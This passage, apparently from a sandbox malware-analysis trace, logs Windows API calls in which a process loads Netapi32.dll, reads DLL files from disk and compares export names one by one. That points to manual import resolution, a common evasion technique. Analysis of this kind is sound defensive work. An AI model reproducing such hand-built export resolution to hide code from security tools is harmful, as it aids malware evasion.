[0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0091.530] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.531] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0091.532] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0091.532] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.532] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.532] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0091.533] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0091.533] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0091.534] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0091.545] GetProcessHeap () returned 0x440000 [0091.545] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x39ad010 | out: hHeap=0x440000) returned 1 [0091.545] GetProcessHeap () returned 0x440000 [0091.545] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x459080 [0091.546] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0091.858] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0091.858] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0091.858] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0091.858] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.859] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0091.859] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0091.859] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0091.859] GetProcessHeap () returned 0x440000 [0091.859] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13b00) returned 0x2c75030 [0091.859] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0091.859] ReadFile (in: hFile=0x17c, lpBuffer=0x2c75030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c75030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0091.862] CloseHandle (hObject=0x17c) returned 1 [0091.862] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0091.862] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0091.862] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0091.862] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0091.863] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0091.864] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0091.865] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0091.865] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0091.866] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0091.867] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0091.868] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0091.868] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0091.869] 